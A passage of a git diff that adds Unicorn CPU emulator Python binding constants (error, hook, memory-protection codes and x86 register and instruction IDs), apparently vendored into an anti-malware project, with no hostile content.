+UC_MODE_PPC64 = 8 +UC_MODE_QPX = 16 +UC_MODE_SPARC32 = 4 +UC_MODE_SPARC64 = 8 +UC_MODE_V9 = 16 + +UC_ERR_OK = 0 +UC_ERR_NOMEM = 1 +UC_ERR_ARCH = 2 +UC_ERR_HANDLE = 3 +UC_ERR_MODE = 4 +UC_ERR_VERSION = 5 +UC_ERR_READ_UNMAPPED = 6 +UC_ERR_WRITE_UNMAPPED = 7 +UC_ERR_FETCH_UNMAPPED = 8 +UC_ERR_HOOK = 9 +UC_ERR_INSN_INVALID = 10 +UC_ERR_MAP = 11 +UC_ERR_WRITE_PROT = 12 +UC_ERR_READ_PROT = 13 +UC_ERR_FETCH_PROT = 14 +UC_ERR_ARG = 15 +UC_ERR_READ_UNALIGNED = 16 +UC_ERR_WRITE_UNALIGNED = 17 +UC_ERR_FETCH_UNALIGNED = 18 +UC_ERR_HOOK_EXIST = 19 +UC_ERR_RESOURCE = 20 +UC_ERR_EXCEPTION = 21 +UC_MEM_READ = 16 +UC_MEM_WRITE = 17 +UC_MEM_FETCH = 18 +UC_MEM_READ_UNMAPPED = 19 +UC_MEM_WRITE_UNMAPPED = 20 +UC_MEM_FETCH_UNMAPPED = 21 +UC_MEM_WRITE_PROT = 22 +UC_MEM_READ_PROT = 23 +UC_MEM_FETCH_PROT = 24 +UC_MEM_READ_AFTER = 25 +UC_HOOK_INTR = 1 +UC_HOOK_INSN = 2 +UC_HOOK_CODE = 4 +UC_HOOK_BLOCK = 8 +UC_HOOK_MEM_READ_UNMAPPED = 16 +UC_HOOK_MEM_WRITE_UNMAPPED = 32 +UC_HOOK_MEM_FETCH_UNMAPPED = 64 +UC_HOOK_MEM_READ_PROT = 128 +UC_HOOK_MEM_WRITE_PROT = 256 +UC_HOOK_MEM_FETCH_PROT = 512 +UC_HOOK_MEM_READ = 1024 +UC_HOOK_MEM_WRITE = 2048 +UC_HOOK_MEM_FETCH = 4096 +UC_HOOK_MEM_READ_AFTER = 8192 +UC_HOOK_INSN_INVALID = 16384 +UC_HOOK_MEM_UNMAPPED = 112 +UC_HOOK_MEM_PROT = 896 +UC_HOOK_MEM_READ_INVALID = 144 +UC_HOOK_MEM_WRITE_INVALID = 288 +UC_HOOK_MEM_FETCH_INVALID = 576 +UC_HOOK_MEM_INVALID = 1008 +UC_HOOK_MEM_VALID = 7168 +UC_QUERY_MODE = 1 +UC_QUERY_PAGE_SIZE = 2 +UC_QUERY_ARCH = 3 +UC_QUERY_TIMEOUT = 4 + +UC_PROT_NONE = 0 +UC_PROT_READ = 1 +UC_PROT_WRITE = 2 +UC_PROT_EXEC = 4 +UC_PROT_ALL = 7 diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py new file mode 100644 index 0000000..9c0fbad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/python/unicorn/x86_const.py @@ -0,0 +1,1599 @@ +# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [x86_const.py] + +# X86 registers + +UC_X86_REG_INVALID = 0 +UC_X86_REG_AH = 1 +UC_X86_REG_AL = 2 +UC_X86_REG_AX = 3 +UC_X86_REG_BH = 4 +UC_X86_REG_BL = 5 +UC_X86_REG_BP = 6 +UC_X86_REG_BPL = 7 +UC_X86_REG_BX = 8 +UC_X86_REG_CH = 9 +UC_X86_REG_CL = 10 +UC_X86_REG_CS = 11 +UC_X86_REG_CX = 12 +UC_X86_REG_DH = 13 +UC_X86_REG_DI = 14 +UC_X86_REG_DIL = 15 +UC_X86_REG_DL = 16 +UC_X86_REG_DS = 17 +UC_X86_REG_DX = 18 +UC_X86_REG_EAX = 19 +UC_X86_REG_EBP = 20 +UC_X86_REG_EBX = 21 +UC_X86_REG_ECX = 22 +UC_X86_REG_EDI = 23 +UC_X86_REG_EDX = 24 +UC_X86_REG_EFLAGS = 25 +UC_X86_REG_EIP = 26 +UC_X86_REG_EIZ = 27 +UC_X86_REG_ES = 28 +UC_X86_REG_ESI = 29 +UC_X86_REG_ESP = 30 +UC_X86_REG_FPSW = 31 +UC_X86_REG_FS = 32 +UC_X86_REG_GS = 33 +UC_X86_REG_IP = 34 +UC_X86_REG_RAX = 35 +UC_X86_REG_RBP = 36 +UC_X86_REG_RBX = 37 +UC_X86_REG_RCX = 38 +UC_X86_REG_RDI = 39 +UC_X86_REG_RDX = 40 +UC_X86_REG_RIP = 41 +UC_X86_REG_RIZ = 42 +UC_X86_REG_RSI = 43 +UC_X86_REG_RSP = 44 +UC_X86_REG_SI = 45 +UC_X86_REG_SIL = 46 +UC_X86_REG_SP = 47 +UC_X86_REG_SPL = 48 +UC_X86_REG_SS = 49 +UC_X86_REG_CR0 = 50 +UC_X86_REG_CR1 = 51 +UC_X86_REG_CR2 = 52 +UC_X86_REG_CR3 = 53 +UC_X86_REG_CR4 = 54 +UC_X86_REG_CR5 = 55 +UC_X86_REG_CR6 = 56 +UC_X86_REG_CR7 = 57 +UC_X86_REG_CR8 = 58 +UC_X86_REG_CR9 = 59 +UC_X86_REG_CR10 = 60 +UC_X86_REG_CR11 = 61 +UC_X86_REG_CR12 = 62 +UC_X86_REG_CR13 = 63 +UC_X86_REG_CR14 = 64 +UC_X86_REG_CR15 = 65 +UC_X86_REG_DR0 = 66 +UC_X86_REG_DR1 = 67 +UC_X86_REG_DR2 = 68 +UC_X86_REG_DR3 = 69 +UC_X86_REG_DR4 = 70 +UC_X86_REG_DR5 = 71 +UC_X86_REG_DR6 = 72 +UC_X86_REG_DR7 = 73 +UC_X86_REG_DR8 = 74 +UC_X86_REG_DR9 = 75 +UC_X86_REG_DR10 = 76 +UC_X86_REG_DR11 = 77 +UC_X86_REG_DR12 = 78 +UC_X86_REG_DR13 = 79 +UC_X86_REG_DR14 = 80 +UC_X86_REG_DR15 = 81 +UC_X86_REG_FP0 = 82 +UC_X86_REG_FP1 = 83 +UC_X86_REG_FP2 = 84 +UC_X86_REG_FP3 = 85 +UC_X86_REG_FP4 = 86 +UC_X86_REG_FP5 = 87 +UC_X86_REG_FP6 = 88 +UC_X86_REG_FP7 = 89 +UC_X86_REG_K0 = 90 +UC_X86_REG_K1 = 91 +UC_X86_REG_K2 = 92 +UC_X86_REG_K3 = 93 +UC_X86_REG_K4 = 94 +UC_X86_REG_K5 = 95 +UC_X86_REG_K6 = 96 +UC_X86_REG_K7 = 97 +UC_X86_REG_MM0 = 98 +UC_X86_REG_MM1 = 99 +UC_X86_REG_MM2 = 100 +UC_X86_REG_MM3 = 101 +UC_X86_REG_MM4 = 102 +UC_X86_REG_MM5 = 103 +UC_X86_REG_MM6 = 104 +UC_X86_REG_MM7 = 105 +UC_X86_REG_R8 = 106 +UC_X86_REG_R9 = 107 +UC_X86_REG_R10 = 108 +UC_X86_REG_R11 = 109 +UC_X86_REG_R12 = 110 +UC_X86_REG_R13 = 111 +UC_X86_REG_R14 = 112 +UC_X86_REG_R15 = 113 +UC_X86_REG_ST0 = 114 +UC_X86_REG_ST1 = 115 +UC_X86_REG_ST2 = 116 +UC_X86_REG_ST3 = 117 +UC_X86_REG_ST4 = 118 +UC_X86_REG_ST5 = 119 +UC_X86_REG_ST6 = 120 +UC_X86_REG_ST7 = 121 +UC_X86_REG_XMM0 = 122 +UC_X86_REG_XMM1 = 123 +UC_X86_REG_XMM2 = 124 +UC_X86_REG_XMM3 = 125 +UC_X86_REG_XMM4 = 126 +UC_X86_REG_XMM5 = 127 +UC_X86_REG_XMM6 = 128 +UC_X86_REG_XMM7 = 129 +UC_X86_REG_XMM8 = 130 +UC_X86_REG_XMM9 = 131 +UC_X86_REG_XMM10 = 132 +UC_X86_REG_XMM11 = 133 +UC_X86_REG_XMM12 = 134 +UC_X86_REG_XMM13 = 135 +UC_X86_REG_XMM14 = 136 +UC_X86_REG_XMM15 = 137 +UC_X86_REG_XMM16 = 138 +UC_X86_REG_XMM17 = 139 +UC_X86_REG_XMM18 = 140 +UC_X86_REG_XMM19 = 141 +UC_X86_REG_XMM20 = 142 +UC_X86_REG_XMM21 = 143 +UC_X86_REG_XMM22 = 144 +UC_X86_REG_XMM23 = 145 +UC_X86_REG_XMM24 = 146 +UC_X86_REG_XMM25 = 147 +UC_X86_REG_XMM26 = 148 +UC_X86_REG_XMM27 = 149 +UC_X86_REG_XMM28 = 150 +UC_X86_REG_XMM29 = 151 +UC_X86_REG_XMM30 = 152 +UC_X86_REG_XMM31 = 153 +UC_X86_REG_YMM0 = 154 +UC_X86_REG_YMM1 = 155 +UC_X86_REG_YMM2 = 156 +UC_X86_REG_YMM3 = 157 +UC_X86_REG_YMM4 = 158 +UC_X86_REG_YMM5 = 159 +UC_X86_REG_YMM6 = 160 +UC_X86_REG_YMM7 = 161 +UC_X86_REG_YMM8 = 162 +UC_X86_REG_YMM9 = 163 +UC_X86_REG_YMM10 = 164 +UC_X86_REG_YMM11 = 165 +UC_X86_REG_YMM12 = 166 +UC_X86_REG_YMM13 = 167 +UC_X86_REG_YMM14 = 168 +UC_X86_REG_YMM15 = 169 +UC_X86_REG_YMM16 = 170 +UC_X86_REG_YMM17 = 171 +UC_X86_REG_YMM18 = 172 +UC_X86_REG_YMM19 = 173 +UC_X86_REG_YMM20 = 174 +UC_X86_REG_YMM21 = 175 +UC_X86_REG_YMM22 = 176 +UC_X86_REG_YMM23 = 177 +UC_X86_REG_YMM24 = 178 +UC_X86_REG_YMM25 = 179 +UC_X86_REG_YMM26 = 180 +UC_X86_REG_YMM27 = 181 +UC_X86_REG_YMM28 = 182 +UC_X86_REG_YMM29 = 183 +UC_X86_REG_YMM30 = 184 +UC_X86_REG_YMM31 = 185 +UC_X86_REG_ZMM0 = 186 +UC_X86_REG_ZMM1 = 187 +UC_X86_REG_ZMM2 = 188 +UC_X86_REG_ZMM3 = 189 +UC_X86_REG_ZMM4 = 190 +UC_X86_REG_ZMM5 = 191 +UC_X86_REG_ZMM6 = 192 +UC_X86_REG_ZMM7 = 193 +UC_X86_REG_ZMM8 = 194 +UC_X86_REG_ZMM9 = 195 +UC_X86_REG_ZMM10 = 196 +UC_X86_REG_ZMM11 = 197 +UC_X86_REG_ZMM12 = 198 +UC_X86_REG_ZMM13 = 199 +UC_X86_REG_ZMM14 = 200 +UC_X86_REG_ZMM15 = 201 +UC_X86_REG_ZMM16 = 202 +UC_X86_REG_ZMM17 = 203 +UC_X86_REG_ZMM18 = 204 +UC_X86_REG_ZMM19 = 205 +UC_X86_REG_ZMM20 = 206 +UC_X86_REG_ZMM21 = 207 +UC_X86_REG_ZMM22 = 208 +UC_X86_REG_ZMM23 = 209 +UC_X86_REG_ZMM24 = 210 +UC_X86_REG_ZMM25 = 211 +UC_X86_REG_ZMM26 = 212 +UC_X86_REG_ZMM27 = 213 +UC_X86_REG_ZMM28 = 214 +UC_X86_REG_ZMM29 = 215 +UC_X86_REG_ZMM30 = 216 +UC_X86_REG_ZMM31 = 217 +UC_X86_REG_R8B = 218 +UC_X86_REG_R9B = 219 +UC_X86_REG_R10B = 220 +UC_X86_REG_R11B = 221 +UC_X86_REG_R12B = 222 +UC_X86_REG_R13B = 223 +UC_X86_REG_R14B = 224 +UC_X86_REG_R15B = 225 +UC_X86_REG_R8D = 226 +UC_X86_REG_R9D = 227 +UC_X86_REG_R10D = 228 +UC_X86_REG_R11D = 229 +UC_X86_REG_R12D = 230 +UC_X86_REG_R13D = 231 +UC_X86_REG_R14D = 232 +UC_X86_REG_R15D = 233 +UC_X86_REG_R8W = 234 +UC_X86_REG_R9W = 235 +UC_X86_REG_R10W = 236 +UC_X86_REG_R11W = 237 +UC_X86_REG_R12W = 238 +UC_X86_REG_R13W = 239 +UC_X86_REG_R14W = 240 +UC_X86_REG_R15W = 241 +UC_X86_REG_IDTR = 242 +UC_X86_REG_GDTR = 243 +UC_X86_REG_LDTR = 244 +UC_X86_REG_TR = 245 +UC_X86_REG_FPCW = 246 +UC_X86_REG_FPTAG = 247 +UC_X86_REG_MSR = 248 +UC_X86_REG_MXCSR = 249 +UC_X86_REG_FS_BASE = 250 +UC_X86_REG_GS_BASE = 251 +UC_X86_REG_ENDING = 252 + +# X86 instructions + +UC_X86_INS_INVALID = 0 +UC_X86_INS_AAA = 1 +UC_X86_INS_AAD = 2 +UC_X86_INS_AAM = 3 +UC_X86_INS_AAS = 4 +UC_X86_INS_FABS = 5 +UC_X86_INS_ADC = 6 +UC_X86_INS_ADCX = 7 +UC_X86_INS_ADD = 8 +UC_X86_INS_ADDPD = 9 +UC_X86_INS_ADDPS = 10 +UC_X86_INS_ADDSD = 11 +UC_X86_INS_ADDSS = 12 +UC_X86_INS_ADDSUBPD = 13 +UC_X86_INS_ADDSUBPS = 14 +UC_X86_INS_FADD = 15 +UC_X86_INS_FIADD = 16 +UC_X86_INS_FADDP = 17 +UC_X86_INS_ADOX = 18 +UC_X86_INS_AESDECLAST = 19 +UC_X86_INS_AESDEC = 20 +UC_X86_INS_AESENCLAST = 21 +UC_X86_INS_AESENC = 22 +UC_X86_INS_AESIMC = 23 +UC_X86_INS_AESKEYGENASSIST = 24 +UC_X86_INS_AND = 25 +UC_X86_INS_ANDN = 26 +UC_X86_INS_ANDNPD = 27 +UC_X86_INS_ANDNPS = 28 +UC_X86_INS_ANDPD = 29 +UC_X86_INS_ANDPS = 30 +UC_X86_INS_ARPL = 31 +UC_X86_INS_BEXTR = 32 +UC_X86_INS_BLCFILL = 33 +UC_X86_INS_BLCI = 34 +UC_X86_INS_BLCIC = 35 +UC_X86_INS_BLCMSK = 36 +UC_X86_INS_BLCS = 37 +UC_X86_INS_BLENDPD = 38 +UC_X86_INS_BLENDPS = 39 +UC_X86_INS_BLENDVPD = 40 +UC_X86_INS_BLENDVPS = 41 +UC_X86_INS_BLSFILL = 42 +UC_X86_INS_BLSI = 43 +UC_X86_INS_BLSIC = 44 +UC_X86_INS_BLSMSK = 45 +UC_X86_INS_BLSR = 46 +UC_X86_INS_BOUND = 47 +UC_X86_INS_BSF = 48 +UC_X86_INS_BSR = 49 +UC_X86_INS_BSWAP = 50 +UC_X86_INS_BT = 51 +UC_X86_INS_BTC = 52 +UC_X86_INS_BTR = 53 +UC_X86_INS_BTS = 54 +UC_X86_INS_BZHI = 55 +UC_X86_INS_CALL = 56 +UC_X86_INS_CBW = 57 +UC_X86_INS_CDQ = 58 +UC_X86_INS_CDQE = 59 +UC_X86_INS_FCHS = 60 +UC_X86_INS_CLAC = 61 +UC_X86_INS_CLC = 62 +UC_X86_INS_CLD = 63 +UC_X86_INS_CLFLUSH = 64 +UC_X86_INS_CLFLUSHOPT = 65 +UC_X86_INS_CLGI = 66 +UC_X86_INS_CLI = 67 +UC_X86_INS_CLTS = 68 +UC_X86_INS_CLWB = 69 +UC_X86_INS_CMC = 70 +UC_X86_INS_CMOVA = 71 +UC_X86_INS_CMOVAE = 72 +UC_X86_INS_CMOVB = 73 +UC_X86_INS_CMOVBE = 74 +UC_X86_INS_FCMOVBE = 75 +UC_X86_INS_FCMOVB = 76 +UC_X86_INS_CMOVE = 77 +UC_X86_INS_FCMOVE = 78 +UC_X86_INS_CMOVG = 79 +UC_X86_INS_CMOVGE = 80 +UC_X86_INS_CMOVL = 81 +UC_X86_INS_CMOVLE = 82 +UC_X86_INS_FCMOVNBE = 83 +UC_X86_INS_FCMOVNB = 84 +UC_X86_INS_CMOVNE = 85 +UC_X86_INS_FCMOVNE = 86 +UC_X86_INS_CMOVNO = 87 +UC_X86_INS_CMOVNP = 88 +UC_X86_INS_FCMOVNU = 89 +UC_X86_INS_CMOVNS = 90 +UC_X86_INS_CMOVO = 91 +UC_X86_INS_CMOVP = 92 +UC_X86_INS_FCMOVU = 93 +UC_X86_INS_CMOVS = 94 +UC_X86_INS_CMP = 95 +UC_X86_INS_CMPPD = 96 +UC_X86_INS_CMPPS = 97 +UC_X86_INS_CMPSB = 98 +UC_X86_INS_CMPSD = 99 +UC_X86_INS_CMPSQ = 100 +UC_X86_INS_CMPSS = 101 +UC_X86_INS_CMPSW = 102 +UC_X86_INS_CMPXCHG16B = 103 +UC_X86_INS_CMPXCHG = 104 +UC_X86_INS_CMPXCHG8B = 105 +UC_X86_INS_COMISD = 106 +UC_X86_INS_COMISS = 107 +UC_X86_INS_FCOMP = 108 +UC_X86_INS_FCOMPI = 109 +UC_X86_INS_FCOMI = 110 +UC_X86_INS_FCOM = 111 +UC_X86_INS_FCOS = 112 +UC_X86_INS_CPUID = 113 +UC_X86_INS_CQO = 114 +UC_X86_INS_CRC32 = 115 +UC_X86_INS_CVTDQ2PD = 116 +UC_X86_INS_CVTDQ2PS = 117 +UC_X86_INS_CVTPD2DQ = 118 +UC_X86_INS_CVTPD2PS = 119 +UC_X86_INS_CVTPS2DQ = 120 +UC_X86_INS_CVTPS2PD = 121 +UC_X86_INS_CVTSD2SI = 122 +UC_X86_INS_CVTSD2SS = 123 +UC_X86_INS_CVTSI2SD = 124 +UC_X86_INS_CVTSI2SS = 125 +UC_X86_INS_CVTSS2SD = 126 +UC_X86_INS_CVTSS2SI = 127 +UC_X86_INS_CVTTPD2DQ = 128 +UC_X86_INS_CVTTPS2DQ = 129 +UC_X86_INS_CVTTSD2SI = 130 +UC_X86_INS_CVTTSS2SI = 131 +UC_X86_INS_CWD = 132 +UC_X86_INS_CWDE = 133 +UC_X86_INS_DAA = 134 +UC_X86_INS_DAS = 135 +UC_X86_INS_DATA16 = 136 +UC_X86_INS_DEC = 137 +UC_X86_INS_DIV = 138 +UC_X86_INS_DIVPD = 139 +UC_X86_INS_DIVPS = 140 +UC_X86_INS_FDIVR = 141 +UC_X86_INS_FIDIVR = 142 +UC_X86_INS_FDIVRP = 143 +UC_X86_INS_DIVSD = 144 +UC_X86_INS_DIVSS = 145 +UC_X86_INS_FDIV = 146 +UC_X86_INS_FIDIV = 147 +UC_X86_INS_FDIVP = 148 +UC_X86_INS_DPPD = 149 +UC_X86_INS_DPPS = 150 +UC_X86_INS_RET = 151 +UC_X86_INS_ENCLS = 152 +UC_X86_INS_ENCLU = 153 +UC_X86_INS_ENTER = 154 +UC_X86_INS_EXTRACTPS = 155 +UC_X86_INS_EXTRQ = 156 +UC_X86_INS_F2XM1 = 157 +UC_X86_INS_LCALL = 158 +UC_X86_INS_LJMP = 159 +UC_X86_INS_FBLD = 160 +UC_X86_INS_FBSTP = 161 +UC_X86_INS_FCOMPP = 162 +UC_X86_INS_FDECSTP = 163 +UC_X86_INS_FEMMS = 164 +UC_X86_INS_FFREE = 165 +UC_X86_INS_FICOM = 166 +UC_X86_INS_FICOMP = 167 +UC_X86_INS_FINCSTP = 168 +UC_X86_INS_FLDCW = 169 +UC_X86_INS_FLDENV = 170 +UC_X86_INS_FLDL2E = 171 +UC_X86_INS_FLDL2T = 172 +UC_X86_INS_FLDLG2 = 173 +UC_X86_INS_FLDLN2 = 174 +UC_X86_INS_FLDPI = 175 +UC_X86_INS_FNCLEX = 176 +UC_X86_INS_FNINIT = 177 +UC_X86_INS_FNOP = 178 +UC_X86_INS_FNSTCW = 179 +UC_X86_INS_FNSTSW = 180 +UC_X86_INS_FPATAN = 181 +UC_X86_INS_FPREM = 182 +UC_X86_INS_FPREM1 = 183 +UC_X86_INS_FPTAN = 184 +UC_X86_INS_FFREEP = 185 +UC_X86_INS_FRNDINT = 186 +UC_X86_INS_FRSTOR = 187 +UC_X86_INS_FNSAVE = 188 +UC_X86_INS_FSCALE = 189 +UC_X86_INS_FSETPM = 190 +UC_X86_INS_FSINCOS = 191 +UC_X86_INS_FNSTENV = 192 +UC_X86_INS_FXAM = 193 +UC_X86_INS_FXRSTOR = 194 +UC_X86_INS_FXRSTOR64 = 195 +UC_X86_INS_FXSAVE = 196 +UC_X86_INS_FXSAVE64 = 197 +UC_X86_INS_FXTRACT = 198 +UC_X86_INS_FYL2X = 199 +UC_X86_INS_FYL2XP1 = 200 +UC_X86_INS_MOVAPD = 201 +UC_X86_INS_MOVAPS = 202 +UC_X86_INS_ORPD = 203 +UC_X86_INS_ORPS = 204 +UC_X86_INS_VMOVAPD = 205 +UC_X86_INS_VMOVAPS = 206 +UC_X86_INS_XORPD = 207 +UC_X86_INS_XORPS = 208 +UC_X86_INS_GETSEC = 209 +UC_X86_INS_HADDPD = 210 +UC_X86_INS_HADDPS = 211 +UC_X86_INS_HLT = 212 +UC_X86_INS_HSUBPD = 213 +UC_X86_INS_HSUBPS = 214 +UC_X86_INS_IDIV = 215 +UC_X86_INS_FILD = 216 +UC_X86_INS_IMUL = 217 +UC_X86_INS_IN = 218 +UC_X86_INS_INC = 219 +UC_X86_INS_INSB = 220 +UC_X86_INS_INSERTPS = 221 +UC_X86_INS_INSERTQ = 222 +UC_X86_INS_INSD = 223 +UC_X86_INS_INSW = 224 +UC_X86_INS_INT = 225 +UC_X86_INS_INT1 = 226 +UC_X86_INS_INT3 = 227 +UC_X86_INS_INTO = 228 +UC_X86_INS_INVD = 229 +UC_X86_INS_INVEPT = 230 +UC_X86_INS_INVLPG = 231 +UC_X86_INS_INVLPGA = 232 +UC_X86_INS_INVPCID = 233 +UC_X86_INS_INVVPID = 234 +UC_X86_INS_IRET = 235 +UC_X86_INS_IRETD = 236 +UC_X86_INS_IRETQ = 237 +UC_X86_INS_FISTTP = 238 +UC_X86_INS_FIST = 239 +UC_X86_INS_FISTP = 240 +UC_X86_INS_UCOMISD = 241 +UC_X86_INS_UCOMISS = 242 +UC_X86_INS_VCOMISD = 243 +UC_X86_INS_VCOMISS = 244 +UC_X86_INS_VCVTSD2SS = 245 +UC_X86_INS_VCVTSI2SD = 246 +UC_X86_INS_VCVTSI2SS = 247 +UC_X86_INS_VCVTSS2SD = 248 +UC_X86_INS_VCVTTSD2SI = 249 +UC_X86_INS_VCVTTSD2USI = 250 +UC_X86_INS_VCVTTSS2SI = 251 +UC_X86_INS_VCVTTSS2USI = 252 +UC_X86_INS_VCVTUSI2SD = 253 +UC_X86_INS_VCVTUSI2SS = 254 +UC_X86_INS_VUCOMISD = 255 +UC_X86_INS_VUCOMISS = 256 +UC_X86_INS_JAE = 257 +UC_X86_INS_JA = 258 +UC_X86_INS_JBE = 259 +UC_X86_INS_JB = 260 +UC_X86_INS_JCXZ = 261 +UC_X86_INS_JECXZ = 262 +UC_X86_INS_JE = 263 +UC_X86_INS_JGE = 264 +UC_X86_INS_JG = 265 +UC_X86_INS_JLE = 266 +UC_X86_INS_JL = 267 +UC_X86_INS_JMP = 268 +UC_X86_INS_JNE = 269 +UC_X86_INS_JNO = 270 +UC_X86_INS_JNP = 271 +UC_X86_INS_JNS = 272 +UC_X86_INS_JO = 273 +UC_X86_INS_JP = 274 +UC_X86_INS_JRCXZ = 275 +UC_X86_INS_JS = 276 +UC_X86_INS_KANDB = 277 +UC_X86_INS_KANDD = 278 +UC_X86_INS_KANDNB = 279 +UC_X86_INS_KANDND = 280 +UC_X86_INS_KANDNQ = 281 +UC_X86_INS_KANDNW = 282 +UC_X86_INS_KANDQ = 283 +UC_X86_INS_KANDW = 284 +UC_X86_INS_KMOVB = 285 +UC_X86_INS_KMOVD = 286 +UC_X86_INS_KMOVQ = 287 +UC_X86_INS_KMOVW = 288 +UC_X86_INS_KNOTB = 289 +UC_X86_INS_KNOTD = 290 +UC_X86_INS_KNOTQ = 291 +UC_X86_INS_KNOTW = 292 +UC_X86_INS_KORB = 293 +UC_X86_INS_KORD = 294 +UC_X86_INS_KORQ = 295 +UC_X86_INS_KORTESTB = 296 +UC_X86_INS_KORTESTD = 297 +UC_X86_INS_KORTESTQ = 298 +UC_X86_INS_KORTESTW = 299 +UC_X86_INS_KORW = 300 +UC_X86_INS_KSHIFTLB = 301 +UC_X86_INS_KSHIFTLD = 302 +UC_X86_INS_KSHIFTLQ = 303 +UC_X86_INS_KSHIFTLW = 304 +UC_X86_INS_KSHIFTRB = 305 +UC_X86_INS_KSHIFTRD = 306 +UC_X86_INS_KSHIFTRQ = 307 +UC_X86_INS_KSHIFTRW = 308 +UC_X86_INS_KUNPCKBW = 309 +UC_X86_INS_KXNORB = 310 +UC_X86_INS_KXNORD = 311 +UC_X86_INS_KXNORQ = 312 +UC_X86_INS_KXNORW = 313 +UC_X86_INS_KXORB = 314 +UC_X86_INS_KXORD = 315 +UC_X86_INS_KXORQ = 316 +UC_X86_INS_KXORW = 317 +UC_X86_INS_LAHF = 318 +UC_X86_INS_LAR = 319 +UC_X86_INS_LDDQU = 320 +UC_X86_INS_LDMXCSR = 321 +UC_X86_INS_LDS = 322 +UC_X86_INS_FLDZ = 323 +UC_X86_INS_FLD1 = 324 +UC_X86_INS_FLD = 325 +UC_X86_INS_LEA = 326 +UC_X86_INS_LEAVE = 327 +UC_X86_INS_LES = 328 +UC_X86_INS_LFENCE = 329 +UC_X86_INS_LFS = 330 +UC_X86_INS_LGDT = 331 +UC_X86_INS_LGS = 332 +UC_X86_INS_LIDT = 333 +UC_X86_INS_LLDT = 334 +UC_X86_INS_LMSW = 335 +UC_X86_INS_OR = 336 +UC_X86_INS_SUB = 337 +UC_X86_INS_XOR = 338 +UC_X86_INS_LODSB = 339 +UC_X86_INS_LODSD = 340 +UC_X86_INS_LODSQ = 341 +UC_X86_INS_LODSW = 342 +UC_X86_INS_LOOP = 343 +UC_X86_INS_LOOPE = 344 +UC_X86_INS_LOOPNE = 345 +UC_X86_INS_RETF = 346 +UC_X86_INS_RETFQ = 347 +UC_X86_INS_LSL = 348 +UC_X86_INS_LSS = 349 +UC_X86_INS_LTR = 350 +UC_X86_INS_XADD = 351 +UC_X86_INS_LZCNT = 352 +UC_X86_INS_MASKMOVDQU = 353 +UC_X86_INS_MAXPD = 354 +UC_X86_INS_MAXPS = 355 +UC_X86_INS_MAXSD = 356 +UC_X86_INS_MAXSS = 357 +UC_X86_INS_MFENCE = 358 +UC_X86_INS_MINPD = 359 +UC_X86_INS_MINPS = 360 +UC_X86_INS_MINSD = 361 +UC_X86_INS_MINSS = 362 +UC_X86_INS_CVTPD2PI = 363 +UC_X86_INS_CVTPI2PD = 364 +UC_X86_INS_CVTPI2PS = 365 +UC_X86_INS_CVTPS2PI = 366 +UC_X86_INS_CVTTPD2PI = 367 +UC_X86_INS_CVTTPS2PI = 368 +UC_X86_INS_EMMS = 369 +UC_X86_INS_MASKMOVQ = 370 +UC_X86_INS_MOVD = 371 +UC_X86_INS_MOVDQ2Q = 372 +UC_X86_INS_MOVNTQ = 373 +UC_X86_INS_MOVQ2DQ = 374 +UC_X86_INS_MOVQ = 375 +UC_X86_INS_PABSB = 376 +UC_X86_INS_PABSD = 377 +UC_X86_INS_PABSW = 378 +UC_X86_INS_PACKSSDW = 379 +UC_X86_INS_PACKSSWB = 380 +UC_X86_INS_PACKUSWB = 381 +UC_X86_INS_PADDB = 382 +UC_X86_INS_PADDD = 383 +UC_X86_INS_PADDQ = 384 +UC_X86_INS_PADDSB = 385 +UC_X86_INS_PADDSW = 386 +UC_X86_INS_PADDUSB = 387 +UC_X86_INS_PADDUSW = 388 +UC_X86_INS_PADDW = 389 +UC_X86_INS_PALIGNR = 390 +UC_X86_INS_PANDN = 391 +UC_X86_INS_PAND = 392 +UC_X86_INS_PAVGB = 393 +UC_X86_INS_PAVGW = 394 +UC_X86_INS_PCMPEQB = 395 +UC_X86_INS_PCMPEQD = 396 +UC_X86_INS_PCMPEQW = 397 +UC_X86_INS_PCMPGTB = 398 +UC_X86_INS_PCMPGTD = 399 +UC_X86_INS_PCMPGTW = 400 +UC_X86_INS_PEXTRW = 401 +UC_X86_INS_PHADDSW = 402 +UC_X86_INS_PHADDW = 403 +UC_X86_INS_PHADDD = 404 +UC_X86_INS_PHSUBD = 405 +UC_X86_INS_PHSUBSW = 406 +UC_X86_INS_PHSUBW = 407 +UC_X86_INS_PINSRW = 408 +UC_X86_INS_PMADDUBSW = 409 +UC_X86_INS_PMADDWD = 410 +UC_X86_INS_PMAXSW = 411 +UC_X86_INS_PMAXUB = 412 +UC_X86_INS_PMINSW = 413 +UC_X86_INS_PMINUB = 414 +UC_X86_INS_PMOVMSKB = 415 +UC_X86_INS_PMULHRSW = 416 +UC_X86_INS_PMULHUW = 417 +UC_X86_INS_PMULHW = 418 +UC_X86_INS_PMULLW = 419 +UC_X86_INS_PMULUDQ = 420 +UC_X86_INS_POR = 421 +UC_X86_INS_PSADBW = 422 +UC_X86_INS_PSHUFB = 423 +UC_X86_INS_PSHUFW = 424 +UC_X86_INS_PSIGNB = 425 +UC_X86_INS_PSIGND = 426 +UC_X86_INS_PSIGNW = 427 +UC_X86_INS_PSLLD = 428 +UC_X86_INS_PSLLQ = 429 +UC_X86_INS_PSLLW = 430 +UC_X86_INS_PSRAD = 431 +UC_X86_INS_PSRAW = 432 +UC_X86_INS_PSRLD = 433 +UC_X86_INS_PSRLQ = 434 +UC_X86_INS_PSRLW = 435 +UC_X86_INS_PSUBB = 436 +UC_X86_INS_PSUBD = 437 +UC_X86_INS_PSUBQ = 438 +UC_X86_INS_PSUBSB = 439 +UC_X86_INS_PSUBSW = 440 +UC_X86_INS_PSUBUSB = 441 +UC_X86_INS_PSUBUSW = 442 +UC_X86_INS_PSUBW = 443 +UC_X86_INS_PUNPCKHBW = 444 +UC_X86_INS_PUNPCKHDQ = 445 +UC_X86_INS_PUNPCKHWD = 446 +UC_X86_INS_PUNPCKLBW = 447 +UC_X86_INS_PUNPCKLDQ = 448 +UC_X86_INS_PUNPCKLWD = 449 +UC_X86_INS_PXOR = 450 +UC_X86_INS_MONITOR = 451 +UC_X86_INS_MONTMUL = 452 +UC_X86_INS_MOV = 453 +UC_X86_INS_MOVABS = 454 +UC_X86_INS_MOVBE = 455 +UC_X86_INS_MOVDDUP = 456 +UC_X86_INS_MOVDQA = 457 